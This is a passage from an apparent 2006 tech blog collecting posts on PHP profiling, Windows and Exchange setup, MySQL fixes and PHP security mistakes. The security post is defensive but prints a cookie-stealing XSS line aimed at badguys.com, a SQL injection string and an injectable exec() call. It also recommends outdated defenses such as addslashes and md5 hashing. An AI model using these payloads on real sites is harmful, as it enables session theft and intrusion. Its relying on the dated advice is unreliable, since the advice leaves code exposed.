You need to isolate the server from other activity, perhaps by barring other users or even disconnecting it from the network. Running tests on a server that's providing a public site may give varying results, as traffic changes during the day. Run your tests on a dedicated server even if the hardware doesn't match the production server. Optimizations made on slower hardware should translate into relative gains when put into production.

The easiest method you can use is insertion of HTML comments into your script's output. This method adds to the overall weight of the page, but it doesn't disturb the display. I usually print the output of the microtime function inside an HTML comment.

I place these calls to microtime at the beginning, end and at key points inside my script. To measure performance, I request the page in a Web browser and view the source.
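A timing comment of the kind just described can be sketched like this (a sketch; `timing_comment` is an illustrative helper name, not from the article):

```php
<?php
// Wrap microtime() output in an HTML comment: invisible in the rendered
// page, but visible when viewing the page source.
function timing_comment($label) {
    return "<!-- " . $label . ": " . microtime() . " -->\n";
}

echo timing_comment("start");
for ($i = 0; $i < 100000; $i++) {
    // work being measured
}
echo timing_comment("after-loop");
```

Viewing the page source then shows two timestamped comments whose difference is the cost of the loop.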

The microtime function returns the number of seconds on the clock as two figures: the first is a fraction of a second, and the second is the number of whole seconds since January 1, 1970. You can add the two numbers and put them in an array, but I prefer to minimize the effect on performance by doing the calculation outside of the script. In the example above, the first part of the script takes approximately 0.005 seconds, and the second part takes 0.03.

If you decide to calculate time differences, consider the method used in the example below. Entries in the clock array contain a one-word description followed by the output of microtime. The explode function breaks up the three values so the script can display a table of timing values. One column of the table holds the number of seconds elapsed since the last entry.
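A sketch of the clock-array technique (an illustrative reconstruction; `checkpoint` is an assumed helper name, not the article's original listing):

```php
<?php
// Record labelled microtime() readings, then print a table of the
// seconds elapsed between consecutive checkpoints.
$clock = array();

function checkpoint(&$clock, $label) {
    $clock[] = $label . " " . microtime();  // "label msec sec"
}

checkpoint($clock, "start");
for ($i = 0; $i < 50000; $i++) {
    // work being measured
}
checkpoint($clock, "after-loop");

$last = 0.0;
foreach ($clock as $entry) {
    // explode() splits each entry into description, fraction, whole seconds.
    list($label, $msec, $sec) = explode(" ", $entry);
    $time = (float)$msec + (float)$sec;
    printf("%-12s %.4f\n", $label, $last > 0 ? $time - $last : 0.0);
    $last = $time;
}
```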

Inserting HTML comments is my favorite method, because it takes no preparation. But its big weakness is a small sample size. I always try three or four page loads to eliminate any variances due to caching or periodic server tasks.

The Apache Web server includes a program that addresses this problem by measuring the number of requests your server can handle. It's called ApacheBench, but the executable is "ab". ApacheBench makes a number of requests to a given URL and reports on how long it took. Here's an example of running 1000 requests for a plain HTML document:

~> /usr/local/apache/bin/ab -n 1000 http://localhost/test.html
This is ApacheBench, Version 1.3c <$Revision: 1.1.2.6 $> apache-1.3
Copyright (c) 1996 Adam Twiss, Zeus Technology Ltd, http://www.zeustech.net/
Copyright (c) 1998-2000 The Apache Group, http://www.apache.org/

Server Software:        Apache/1.3.19
Server Hostname:        localhost
Server Port:            80

Document Path:          /test.html
Document Length:        6 bytes

Concurrency Level:      1
Time taken for tests:   5.817 seconds
Complete requests:      1000
Failed requests:        0
Total transferred:      262000 bytes
HTML transferred:       6000 bytes
Requests per second:    171.91
Transfer rate:          45.04 kb/s received

Connnection Times (ms)
              min  avg  max
Connect:        1    1   11
Processing:     3    3   16
Total:          4    4   27

I requested an HTML document to get an idea of the baseline performance of my server. Any PHP script ought to be slower than an HTML document. Comparing the figures gives me an idea of the room for improvement. If I found my server could serve a PHP script at 10 requests per second, I'd have a lot of room for improvement.

Keep in mind that I'm running ApacheBench on the server. This eliminates the effects of moving data over the network, but ApacheBench uses some CPU time. I could test from another machine to let the Web server use all the system resources.

By default, ApacheBench makes one connection at a time. If you use 100 for the -n option, it connects to the server one hundred times sequentially. In reality, Web servers handle many requests at once. Use the -c option to set the concurrency level. For example, -n 1000 -c 10 makes one thousand connections with 10 requests active at all times. This usually reduces the number of requests the server can handle, but at low levels the server is waiting for hardware, such as the hard disk.

The ApacheBench program is a good way to measure overall change without inconsistencies, but it can't tell you which parts of a script are slower than others. It also includes the overhead involved with connecting to the server and negotiating for the document using HTTP. You can get around this limitation by altering your script. If you comment out parts and compare performance, you can gain an understanding of which parts are slowest. Alternatively, you may use ApacheBench together with microtime comments.

Whichever method you use, be sure to test with a range of values. If your program uses input from the user, try both the easy cases and the difficult ones, but concentrate on the common cases. For example, when testing a program that analyzes text from a textarea tag, don't limit yourself to typing a few words into the form. Enter realistic data, including large values, but don't bother with values so large they fall out of normal usage. People rarely type a megabyte of text into a textarea, so if performance drops off sharply, it's probably not worth worrying about.

Remember to measure again after each change to your program, and stop when you achieve your goal. If a change reduces performance, return to an earlier version. Let your measurements justify your changes.

Attacking the slowest parts

Although there are other motivations, such as personal satisfaction, most people optimize a program to save money. Don't lose sight of this as you spend time increasing the performance of your programs. There's no sense in spending more time optimizing than the optimization itself saves. Optimizing an application used by many people is usually worth the time, especially if you benefit from licensing fees. It's hard to judge the value of an open-source application you optimize, but I find work on open-source projects satisfying as recreation.

To make the most of your time, try to optimize the slowest parts of your program where you stand to gain the most. Generally, you should try to improve algorithms by finding faster alternatives. Computer scientists use a special notation to describe the relative efficiency of an algorithm, called big-O notation. An algorithm that must examine each input datum once is O(n). An algorithm that must examine each element twice is still O(n), because constant factors are ignored. A really slow algorithm might be O(n^2), read "O of n squared". A really fast algorithm might be O(n log n), n times the logarithm of n. This subject is far too complex to cover here -- you will find lots of information on the Internet and in university courses. Understanding it may help you choose faster algorithms.

Permanent storage, such as a hard disk, is much slower to use than volatile storage, such as RAM. Operating systems compensate somewhat by caching disk blocks to system memory, but you can't keep your entire system in RAM. Parts of your program that use permanent storage are good candidates for optimization.

If you are using data stored in files, consider using a relational database instead. Database servers can do a better job of caching data than the operating system because they view the data with a finer granularity. Database servers may also cache open files, saving you the overhead in opening and closing files.

Alternatively, you can try caching data within your own program, but consider the lifecycle of a PHP script. At the end of the request, PHP frees all memory. If during your program you need to refer to the same file many times, you may increase performance by reading the file into a variable.
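For instance, a request that consults the same file repeatedly can read it once into a variable (a sketch; the key=value file format and the `lookup` helper are assumptions for illustration):

```php
<?php
// Write a throwaway data file to stand in for a file the script
// would otherwise re-read on every use.
$path = tempnam(sys_get_temp_dir(), "cfg");
file_put_contents($path, "colour=blue\nsize=large\n");

// One disk read; every later lookup works on the in-memory copy.
$cached = file_get_contents($path);

function lookup($cached, $key) {
    foreach (explode("\n", trim($cached)) as $line) {
        list($k, $v) = explode("=", $line, 2);
        if ($k === $key) {
            return $v;
        }
    }
    return null;
}

echo lookup($cached, "colour"), "\n";  // blue
echo lookup($cached, "size"), "\n";    // large
unlink($path);
```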

Consider optimizing your database queries, too. MySQL includes the EXPLAIN statement, which returns information about how the join engine uses indexes. MySQL's online manual includes information about the process of optimizing queries.

Here are two tips for loops. If the number of iterations in a loop is low, you might get some performance gain from replacing the loop with a number of statements. For example, consider a for loop that sets 10 values in an array. You can replace the loop with 10 statements, which is a duplication of code, but may execute slightly faster.
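The unrolling described above can be sketched like this (an illustrative example, not from the original article):

```php
<?php
// Ten array assignments via a loop...
$squares = array();
for ($i = 0; $i < 10; $i++) {
    $squares[$i] = $i * $i;
}

// ...versus the unrolled version: duplicated code, but no loop
// counter, comparison, or increment executed on each step.
$unrolled = array(0, 1, 4, 9, 16, 25, 36, 49, 64, 81);

var_dump($squares === $unrolled);  // bool(true)
```

The gain is small and the duplication hurts readability, so this is only worth doing in genuinely hot code.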

Also, don't recompute values inside a loop. If a value, such as an array's length, doesn't change while the loop runs, compute it once before the loop instead of on every iteration.
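One common case of recomputation inside a loop is calling count() in a for condition (an assumed example, not from the original article):

```php
<?php
$items = range(1, 1000);

// count($items) is re-evaluated on every iteration:
$sum1 = 0;
for ($i = 0; $i < count($items); $i++) {
    $sum1 += $items[$i];
}

// Computed once, before the loop:
$sum2 = 0;
$n = count($items);
for ($i = 0; $i < $n; $i++) {
    $sum2 += $items[$i];
}

var_dump($sum1 === $sum2);  // bool(true)
```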

Function calls carry a high overhead. You can get a bump in performance if you eliminate a function. Compiled languages, such as C and Java, have the luxury of replacing function calls with inline code. You should avoid functions that you only call once. One technique for readable code is to use functions to hide details. This technique is expensive in PHP.

If all else fails, you have the option of moving part of your code into C, wrapping it in a PHP function. This technique is not for the novice, but many of PHP's functions began as optimizations. Consider the in_array function. You can test for the presence of the value in an array by looping through it, but the function written in C is much faster.
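For comparison, a pure-PHP stand-in for in_array might look like this (`my_in_array` is an illustrative name; the built-in performs the same linear scan, only in compiled C):

```php
<?php
// A hand-rolled linear search over an array...
function my_in_array($needle, $haystack) {
    foreach ($haystack as $value) {
        if ($value == $needle) {
            return true;
        }
    }
    return false;
}

$data = range(1, 10000);

// ...gives the same answers as the built-in C implementation.
var_dump(my_in_array(9999, $data));  // bool(true)
var_dump(in_array(9999, $data));     // bool(true)
```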

Monday, January 16, 2006

How to backup and restore outlook express 6.0

This works with Outlook Express 6.0 on any Windows platform (I have used it on Windows XP, 2003, and 98).

Backing up your email


Open Outlook Express

A) Backup accounts

1) go to Tools -> Accounts
2) click on the Mail tab
3) for each account that is there, click on "Export" and save these files to your hard drive

B) Backup emails

1) find your store folder by going to Tools -> Options -> Maintenance and clicking on "Store Folder"
2) back up this entire folder to a separate location

Any message rule will need to be backed up by hand.

Restoring your email

Open Outlook Express on the target computer

A) restoring accounts

1) go to Tools -> Accounts
2) click on the Mail tab
3) click on "Import" and import each file that you exported in the steps above.

B) Restore folders

1) look in the backup folder from above, and create a new folder with the same name as each dbx file there (i.e. if there is a file called my_email.dbx, make a folder called my_email)

C) Restore all email

1) find the new store folder using part B step 1 from above
2) close Outlook Express
3) copy all backup data into the new store folder from step 1
4) open Outlook Express; it should be an exact copy of the mailbox that was backed up.

Sunday, January 15, 2006

How to make an exchange auto-install CD

By: Daniel Petri

You can configure Exchange 2000/2003 to install without having to manually enter the CD key during the setup process.

First, you should copy your Exchange 2000/2003 setup files from your CD to your hard drive.

Find a file called Setup.sdb (which is found in the \SETUP\I386 subfolder). Right click the file, select Properties, and remove the Read-only checkmark. Now open the file to edit it.

Look inside your Setup.sdb file for a section called

[Product Information]
In that section, look for a line beginning with:
DefaultPid30=
If you cannot find such a line, insert a new empty line somewhere in that section, and paste the new value in the following format:
DefaultPid30=ABCDE-FGHIJ-KLMNO-PQRST-UVWXY

note: Use your own CD key, the above string is just an example!

Save the file, then burn the whole folder that contains the installation files to a CD.
That's it! Now you can install Exchange 2000/2003 without needing to supply a CD key during the setup process!

How to change the product key on windows 2003

By: Daniel Petri

Warning!
This document contains instructions for editing the registry. If you make any error while editing the registry, you can potentially cause Windows to fail or be unable to boot, requiring you to reinstall Windows. Edit the registry at your own risk. Always back up the registry before making any changes. If you do not feel comfortable editing the registry, do not attempt these instructions. Instead, seek the help of a trained computer specialist.


Note: Microsoft recommends that you run System Restore to create a new restore point before you complete the following steps:

1) Click Start, and then click Run.

2) In the Open box, type Regedit, and then click OK.

3) In the left pane, locate and then click the following registry key:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WPAEvents

4) In the right pane, right-click OOBETimer, and then click Modify.

5) Change at least one digit of this value to deactivate Windows.

6) Click Start, and then click Run.

7) In the Open box, type the following command, and then click OK.

%systemroot%\system32\oobe\msoobe.exe /a

8) Click Yes, I want to telephone a customer service representative to activate Windows, and then click Next.

9) Click Change Product key.

10) Type the new product key in the New key boxes, and then click Update. If you are returned to the previous window, click Remind me later, and then restart the computer.

11) Repeat steps 6 and 7 to verify that Windows is activated. You should receive the message: "Windows is already activated. Click OK to exit."

12) Click OK.

Friday, January 13, 2006

Apache hits 80 million website mark


(originally from netcraft.com)

In the October 2005 survey we received responses from 74,409,971 sites, an increase of 2.68 million sites from the September survey. The large gain makes 2005 the strongest year ever for Internet growth, as the web has added 17.5 million sites, easily surpassing the previous annual mark of 16 million during the height of the dot-com boom in 2000.

This month also saw movement in web server market share for the first time in many months, with Windows servers gaining 0.75 percent market share in active sites, while Apache's share fell by 0.67 percent. Apache continues to maintain a large lead in both active sites and hostnames, and in fact improved its share by 0.74 percent in hostnames. With this month's growth, Apache now powers more than 50 million sites.

Top Developers
Developer    Sep 2005     Percent   Oct 2005     Percent   Change
Apache       49,598,424   69.15     52,005,811   69.89     +0.74
Microsoft    14,601,553   20.36     15,293,030   20.55     +0.19
Sun           1,868,891    2.61      1,889,989    2.54     -0.07
Zeus            584,598    0.82        585,972    0.79     -0.03

Active Sites

Developer    Sep 2005     Percent   Oct 2005     Percent   Change
Apache       22,518,078   69.91     23,270,873   69.24     -0.67
Microsoft     7,315,449   22.71      7,883,664   23.46     +0.75
Zeus            224,619    0.70        217,451    0.65     -0.05
Sun             216,165    0.67        203,349    0.61     -0.06

PHP for the ASP developer

(originally by nathan pond)

Over 4 years ago I set out to learn how I could build a web page. Within months I had immersed myself in the world of ASP and databases. It was all so cool... and I wanted to use it on my personal web site.

For starters, PHP is very well documented on the php.net web site (http://www.php.net/docs.php). One key difference I noticed was the built-in functionality. As I'm sure most of you know, to do just about anything in ASP you need to create an instance of an object. This isn't the case in PHP. There are built-in functions for e-mail, file manipulation, DNS lookups, images, and just about everything else you can think of. Tasks such as sending e-mail can actually be done with one line of code. But before I talk PHP up too much, it should be known that I was upset with one major weakness: version 3 of PHP had no session support. This has been added in version 4 of PHP, but not all hosts have made the upgrade yet, so be careful to look for that if sessions are important to you. I ended up just writing my own session routines.
One thing that always came back to nip me in the butt was forgetting to end each line with a semi-colon (;). PHP is much more picky about syntax than ASP. If you are a C++ programmer, this is nothing new to you. I haven't used C++ in over a year, and had grown accustomed to creating ASP with VBScript, so it was a big change for me. (Likewise, if you have been creating ASP pages with JScript (or better still, PerlScript), then the conversion to PHP should go much more smoothly...)

Commenting - There have been numerous times when I have wanted to comment out a block of code. In ASP I had to insert an apostrophe at the beginning of each line. PHP uses the same methods as C++.

Here's an example:

<%
'this is a comment in ASP
%>

<?
//this is a comment in PHP

/*
This can also be used to comment out large chunks of text

this line is still commented

so is this....
*/
?>

Another huge difference is that in PHP all variables are used with a dollar sign ($). This is a little difficult to get used to at first. All variables must start with a $ as shown:

<?
$myVar = 0;
?>

Case sensitivity - Now before you get too scared, let me explain. Variable names are case sensitive: $MYVAR and $myvar are two separate variables. However, function names and commands are not case sensitive, meaning that

<?
ECHO "This is a test";
?>

and

<?
echo "This is a test";
?>

are the same thing.

The equals sign - In VBScript, and Visual Basic, the equals sign (=) does everything. It assigns values to variables and also checks conditions in if statements and loops. This isn't so in PHP. A single = will assign a value, just like in ASP.
<?
$myVar = "This value";
?>

However, when you are using conditionals (if statements, loops, etc.) you MUST use a double equals sign (==) or your script will not work as intended. This is one of the most common mistakes: a script won't work right, and you look over your code again and again without seeing anything wrong. I have wasted up to an hour debugging after making this mistake.
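The mistake looks like this (a sketch):

```php
<?php
$myVar = 5;

// BUG: a single = assigns 10 to $myVar, and the value of the
// assignment expression (10) is truthy, so this branch always runs.
if ($myVar = 10) {
    echo "always reached\n";
}

// Correct: == compares without assigning.
if ($myVar == 10) {
    echo "myVar is ten\n";
}
```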

Kind of on a related note, inequalities are tested with != instead of <>.

Connecting strings - Strings are concatenated in PHP with the dot (.), as opposed to VBScript's ampersand (&).

<?
$myVar1 = "This is a test.";
$myVar2 = " And I love it!!!";

$myVar3 = $myVar1.$myVar2;

echo $myVar3; // $myVar3 contains the text:
// "This is a test. And I love it!!!"
?>

Function return values - In VBScript, to return the value of a function you simply set the function name to the value you want to return. Like this:

<%
Function myFunction()
myFunction = 1 'Return value
End Function
%>

However, in PHP you use the return command.

<?
function myFunction() {
return 1; //Return value
}
?>

Of course, there are many more differences, but this will get you started. If I had known these points when I was learning PHP it would have saved me a lot of late nights.

Happy programming!

Wednesday, January 11, 2006

Mysql: Client Does not support authentication protocol

Introduction

If you have ever gotten the error "Client does not support authentication protocol" when trying to use PHP or any other language to connect to a MySQL server, there is a simple method to fix it.

Why Does this happen?

MySQL 4.1 and later use an authentication protocol based on a password hashing algorithm that is incompatible with the one used by older (pre-4.1) clients. If you upgrade the server to 4.1 or later, attempts to connect to it with an older client may fail with the following message:
shell> mysql
Client does not support authentication protocol requested by server; consider upgrading MySQL client

Solution

To solve this problem, the easiest and most effective fix is to reset the account's password using the old hashing format:

mysql> SET PASSWORD FOR
    -> 'some_user'@'some_host' = OLD_PASSWORD('newpwd');

Alternatively, use UPDATE and FLUSH PRIVILEGES:

mysql> UPDATE mysql.user SET Password = OLD_PASSWORD('newpwd')
    -> WHERE Host = 'some_host' AND User = 'some_user';
mysql> FLUSH PRIVILEGES;

Substitute the password you want to use for “newpwd” in the preceding examples. MySQL cannot tell you what the original password was, so you'll need to pick a new one.
Alternatively, tell the server to generate old-format password hashes by starting mysqld with the --old-passwords option. Then, for each account that still has a new-format password, use its Host and User values and assign a password with the OLD_PASSWORD() function and either SET PASSWORD or UPDATE, as described earlier.

Note: In older versions of PHP, the mysql extension does not support the authentication protocol in MySQL 4.1.1 and higher. This is true regardless of the PHP version being used. If you wish to use the mysql extension with MySQL 4.1 or newer, you may need to follow one of the options discussed above for configuring MySQL to work with old clients. The mysqli extension (stands for "MySQL, Improved"; added in PHP 5) is compatible with the improved password hashing employed in MySQL 4.1 and higher, and no special configuration of MySQL need be done in order to use this MySQL client library. For more information about the mysqli extension, see http://php.net/mysqli.

Top 5 PHP Security Mistakes

Introduction

Although I am trying to concentrate on Windows-related open source material, the following are helpful security precautions that should be taken into account when developing PHP web applications on any platform.

Unvalidated Input Errors

One of -- if not the -- most common PHP security flaws is the unvalidated input error. User-provided data simply cannot be trusted. You should assume every one of your Web application users is malicious, since it's certain that some of them will be. Unvalidated or improperly validated input is the root cause of many of the exploits we'll discuss later in this article.
As an example, you might write the following code to allow a user to view a calendar that displays a specified month by calling the UNIX cal command.

$month = $_GET['month'];
$year = $_GET['year'];

exec("cal $month $year", $result);

Because $month and $year come straight from the query string, a malicious user can append shell metacharacters (a semicolon followed by another command, for example) and have arbitrary commands executed on your server.

The proper way to correct this is to ensure that the input you receive from the user is what you expect it to be. Do not use JavaScript validation for this; such validation methods are easily worked around by an exploiter who creates their own form or disables JavaScript. You need to add PHP code to ensure that the month and year inputs are digits and only digits, as shown below.

$month = $_GET['month'];
$year = $_GET['year'];

if (!preg_match("/^[0-9]{1,2}$/", $month))
    die("Bad month, please re-enter.");
if (!preg_match("/^[0-9]{4}$/", $year))
    die("Bad year, please re-enter.");
exec("cal $month $year", $result);

Access Control Flaws

Another type of flaw that's not necessarily restricted to PHP applications, but is important nonetheless, is the access control type of vulnerability. This flaw rears its head when you have certain sections of your application that must be restricted to certain users, such as an administration page that allows configuration settings to be changed, or displays sensitive information.

You should check the user's credentials upon every load of a restricted page of your PHP application. If you check the user's credentials on the index page only, a malicious user could directly enter a URL to a "deeper" page, which would bypass this credential checking process.

It's also advisable to layer your security, for example, by restricting user access on the basis of the user's IP address as well as their user name, if possible. Placing your restricted pages in a separate directory that's protected by an apache .htaccess file is also good practice.

Place configuration files outside your Web-accessible directory. A configuration file can contain database passwords and other information that could be used by malicious users to penetrate or deface your site; never allow these files to be accessed by remote users. Use the PHP include function to include these files from a directory that's not Web-accessible, possibly including an .htaccess file containing "deny from all". Though this is redundant, layering security is a positive thing.

For my PHP applications, I prefer a directory structure based on the sample below. All function libraries, classes and configuration files are stored in the includes directory. Always name these include files with a .php extension, so that even if all your protection is bypassed, the Web server will parse the PHP code, and will not display it to the user. The www and admin directories are the only directories whose files can be accessed directly by a URL; the admin directory is protected by an .htaccess file that allows users entry only if they know a user name and password that's stored in the .htpasswd file in the root directory of the site.
/home
  /httpd
    /www.example.com
      .htpasswd
      /includes
        cart.class.php
        config.php
      /logs
        access_log
        error_log
      /www
        index.php
      /admin
        .htaccess
        index.php
You should set your Apache directory indexes to 'index.php', and keep an index.php file in every directory. Set it to redirect to your main page if the directory should not be browsable, such as an images directory or similar.

Never, ever, make a backup of a php file in your Web-exposed directory by adding .bak or another extension to the filename. If you do this, the PHP code in the file will not be parsed by the Web server, and may be output as source to a user who stumbles upon a URL to the backup file. If that file contained passwords or other sensitive information, that information would be readable -- it could even end up being indexed by Google if the spider stumbled upon it! Renaming files to have a .bak.php extension is safer than tacking a .bak onto the .php extension, but the best solution is to use a source code version control system like CVS. CVS can be complicated to learn, but the time you spend will pay off in many ways. The system saves every version of each file in your project, which can be invaluable when changes are made that cause problems later.

Session ID Protection

Session ID hijacking can be a problem with PHP Websites. The PHP session tracking component uses a unique ID for each user's session, but if this ID is known to another user, that person can hijack the user's session and see information that should be confidential. Session ID hijacking cannot completely be prevented; you should know the risks so you can mitigate them.

For instance, even after a user has been validated and assigned a session ID, you should revalidate that user when he or she performs any highly sensitive actions, such as resetting passwords. Never allow a session-validated user to enter a new password without also entering their old password, for example. You should also avoid displaying truly sensitive data, such as credit card numbers, to a user who has only been validated by session ID.

A user who creates a new session by logging in should be assigned a fresh session ID using the session_regenerate_id function. A hijacking user will try to set his session ID prior to login; this can be prevented if you regenerate the ID at login.
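A sketch of regenerating the ID at login (`login_ok` and the credentials are hypothetical placeholders, not a real API):

```php
<?php
session_start();
$old_id = session_id();

// Stand-in for a real credential check.
function login_ok($user, $pass) {
    return $user === "alice" && $pass === "secret";
}

if (login_ok("alice", "secret")) {
    // Issue a fresh session ID; any ID an attacker planted before
    // login no longer refers to this authenticated session.
    session_regenerate_id(true);
    $_SESSION["user"] = "alice";
}

var_dump(session_id() !== $old_id);  // bool(true)
```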
If your site is handling critical information such as credit card numbers, always use an SSL secured connection. This will help reduce session hijacking vulnerabilities since the session ID cannot be sniffed and easily hijacked.

If your site is run on a shared Web server, be aware that any session variables can easily be viewed by any other users on the same server. Mitigate this vulnerability by storing all sensitive data in a database record that's keyed to the session ID rather than as a session variable. If you must store a password in a session variable, do not store the password in clear text; use the sha1() (PHP 4.3+) or md5() function to store the hash of the password instead.

if ($_SESSION['password'] == $userpass) { // do sensitive things here }

The above code is not secure, since the password is stored in plain text in a session variable.

Instead, use code more like this:
if ($_SESSION['sha1password'] == sha1($userpass)) { // do sensitive things here }

The SHA-1 algorithm is not without its flaws, and further advances in computing power are making it possible to generate what are known as collisions (different strings with the same SHA-1 sum). Yet the above technique is still vastly superior to storing passwords in clear text. Use MD5 if you must -- since it's superior to a clear text-saved password -- but keep in mind that recent developments have made it possible to generate MD5 collisions in less than an hour on standard PC hardware. Ideally, one should use a function that implements SHA-256; such a function does not currently ship with PHP and must be found separately.

For further reading on hash collisions, among other security related topics, Bruce Schneier's Website is a great resource.
Cross Site Scripting (XSS) Flaws
Cross site scripting, or XSS, flaws are a subset of user validation where a malicious user embeds scripting commands -- usually JavaScript -- in data that is displayed and therefore executed by another user.

For example, if your application included a forum in which people could post messages to be read by other users, a malicious user could embed a script tag, shown below, which would reload the page to a site controlled by them, pass your cookie and session information as GET variables to their page, then reload your page as though nothing had happened. The malicious user could thereby collect other users' cookie and session information, and use this data in a session hijacking or other attack on your site.

document.location = 'http://www.badguys.com/cgi-bin/cookie.php?' + document.cookie;
To prevent this type of attack, you must validate user input and disallow script tags from being submitted through your forms. Always convert the < and > characters in user input that may be viewed by other users to their HTML entity equivalents, &lt; and &gt; (PHP's htmlspecialchars() function does this). It may also be wise to convert the parentheses, ampersand, and hash (#) characters to their HTML entity equivalents.
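The entity conversion described above can be sketched in Python, where the standard library's html.escape performs the equivalent of PHP's htmlspecialchars() (the payload string below is purely illustrative):

```python
import html

def sanitize(user_input: str) -> str:
    # Convert &, <, >, and quote characters to HTML entities so any
    # embedded <script> tag is rendered as text rather than executed.
    return html.escape(user_input, quote=True)

payload = "<script>document.location='http://www.badguys.com/c.php?'+document.cookie</script>"
print(sanitize(payload))
```

The escaped output contains no literal script tags, so a browser displaying it will show the attack string instead of running it.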

SQL Insertion Vulnerabilities

SQL insertion vulnerabilities are yet another class of input validation flaws. Specifically, they allow for the exploitation of a database query. For example, in your PHP script, you might ask the user for a user ID and password, then check for the user by passing the database a query and checking the result.

SELECT * FROM users WHERE name='$username' AND pass='$password';
However, if the user who's logging in is devious, he may enter the following as his password:
' OR '1'='1

This results in the query being sent to the database as:
SELECT * FROM users WHERE name='known_user' AND pass='' OR '1'='1';
This will return the user's record without validating the password -- the malicious user has gained entry to your application as a user of his choice. To alleviate this problem, ensure that the magic_quotes_gpc PHP ini variable is turned on (the default in most recently released versions of PHP). If you're developing software that may be installed on shared servers where the end user can't change php.ini, use code to check the status of magic_quotes_gpc and, if it is turned off, pass any user input that will be used in a database query through the addslashes() function, as shown below.
if (get_magic_quotes_gpc()) {
    $username = $_GET["username"];
} else {
    $username = addslashes($_GET["username"]);
}

Do not use addslashes() on your input if magic_quotes_gpc is on, as this will double escape your input and lead to problems.
SQL insertion flaws do not always lead to privilege escalation; they can also allow a malicious user to read database records he shouldn't see if the result of the query is printed to your HTML output.

You should always check user-provided data that will be used in a query for the single quote, double quote, comma, semicolon, and parenthesis characters and, possibly, for the keywords "FROM", "LIKE", and "WHERE" in a case-insensitive fashion. These are the characters and keywords most useful in a SQL insertion attack, so if you strip them from user input where they're unnecessary, you'll have much less to worry about from this type of flaw.
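Beyond escaping and keyword filtering, a more robust defense -- not covered in the article, and sketched here as an assumption using Python's sqlite3 rather than PHP/MySQL -- is parameterized queries, which send user input separately from the SQL text so it can never change the query's structure:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, pass TEXT)")
conn.execute("INSERT INTO users VALUES ('known_user', 'hunter2')")

def login(username: str, password: str) -> bool:
    # The ? placeholders bind the values outside the SQL string,
    # so quotes in the input are treated as data, not syntax.
    cur = conn.execute(
        "SELECT * FROM users WHERE name=? AND pass=?", (username, password)
    )
    return cur.fetchone() is not None

print(login("known_user", "hunter2"))       # True: correct credentials
print(login("known_user", "' OR '1'='1"))   # False: injection is neutralized
```

With placeholders, the classic ' OR '1'='1 payload is compared literally against the stored password and simply fails to match.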

Error Reporting

You should ensure that your display_errors php.ini value is set to "0". Otherwise, any errors that are encountered in your code, such as database connection errors, will be output to the end user's browser. A malicious user could leverage this flaw to gain information about the internal workings of your application, simply by providing bad input and reading the error messages that result.

The display_errors value can be set at runtime using the ini_set function, but this is less desirable than setting it in the ini file: if the script has a fatal compilation error and cannot run at all, ini_set is never executed and the error is still displayed.

Instead of displaying errors, set the log_errors ini variable to "1" (and, optionally, point the error_log variable at a log file) and check your PHP error log frequently for caught errors. Alternatively, you can write your own error-handling functions that are invoked automatically when PHP encounters an error and can email you or execute other PHP code of your choice. This is a wise precaution: you'll be notified of an error and may have it fixed before malicious users even know the problem exists. Read the PHP manual pages on error handling and learn about the set_error_handler() function.
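The same principle -- log full details for the administrator, show the user nothing sensitive -- can be sketched in Python (the logger setup, file name, and handler function here are illustrative assumptions, not part of the article):

```python
import logging

# Send error details to a log file the administrator reads, instead of
# echoing them back to the end user's browser.
logger = logging.getLogger("app")
logger.setLevel(logging.ERROR)
logger.addHandler(logging.FileHandler("app_errors.log", mode="w"))

def handle_request():
    try:
        1 / 0  # simulate a runtime failure (e.g. a bad database connection)
    except Exception:
        logger.exception("internal error")    # full traceback goes to the log
        return "An internal error occurred."  # generic message for the user

print(handle_request())
```

The user sees only a generic message; the traceback that would help an attacker map your application's internals goes to app_errors.log.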

Tuesday, January 10, 2006

mysql or microsoft sql?

(originally from mssqlcity.com)

Introduction

People in newsgroups often ask for a comparison of Microsoft SQL Server and MySQL. In this article, I compare SQL Server 2000 with MySQL version 4.1 regarding price, performance, supported platforms, SQL dialects and product limits.

Platform comparison

SQL Server 2000 only runs on Windows-based platforms, including Windows 9x, Windows NT, Windows 2000 and Windows CE. In comparison, MySQL version 4.1 supports many platforms, including Windows, AIX, HP-UX, Linux on Intel, Sun Solaris and so on.

Hardware requirements

To install SQL Server 2000, you need an Intel or compatible platform and the following hardware:

Processor: Pentium 166 MHz or higher
Memory: 32 MB RAM (minimum for Desktop Engine), 64 MB RAM (minimum for all other editions), 128 MB RAM or more recommended
Hard disk space: 270 MB (full installation), 250 MB (typical), 95 MB (minimum), 44 MB (Desktop Engine)
Analysis Services: 50 MB minimum, 130 MB typical
English Query: 80 MB

MySQL version 4.1 is not as powerful as SQL Server 2000 and uses fewer hardware resources.

To install MySQL version 4.1, you need roughly 32 MB of RAM and roughly 60 MB of hard disk space. A typical MySQL version 4.1 installation does not require additional CPU resources.

Software requirements: SQL Server 2000 comes in six editions: Enterprise, Standard, Personal, Developer, Desktop Engine, and SQL Server CE (a version compatible with Windows CE).

MySQL version 4.1 comes in two editions:

The Standard edition is recommended for most users and contains the general MySQL features. The Max edition includes additional features such as the Berkeley DB storage engine, OpenSSL support, user-defined functions (UDFs), and BIG_TABLE support. MySQL version 4.1 requires the following software:

Platform: Operating system version(s)
Windows: Windows 95/98/NT/2000/XP/2003
Sun Solaris: Solaris 8 (SPARC)
FreeBSD: FreeBSD 4.x (x86)
Mac OS X: Mac OS X v10.2
HP-UX: HP-UX 10.20 (PA-RISC 1.0), HP-UX 11.11 (PA-RISC 1.1 and 2.0), HP-UX 11.11 (PA-RISC 2.0, 64-bit only)
AIX: AIX 4.3.2 (RS6000), AIX 4.3.3 (RS6000), AIX 5.1 (RS6000)
QNX: QNX 6.2.1 (x86)
SGI Irix: SGI Irix 6.5
Dec OSF: Dec OSF 5.1 (Alpha)

Performance comparison

It is very difficult to compare the performance of SQL Server 2000 and MySQL version 4.1. The performance of your databases depends more on the experience of the database developers and administrators than on the database vendor, and you can build stable, efficient systems with either RDBMS. However, it is possible to define the typical transactions used in inventory control systems, airline reservation systems and banking systems, and then run them under different database management systems on different hardware and software platforms.

TPC tests

The Transaction Processing Performance Council (TPC.org) is an independent organization that specifies typical transactions (those used in inventory control systems, airline reservation systems and banking systems) and the general rules these transactions should satisfy. The TPC produces benchmarks that measure transaction processing and database performance in terms of how many transactions a given system and database can perform per unit of time, e.g. transactions per second or per minute.

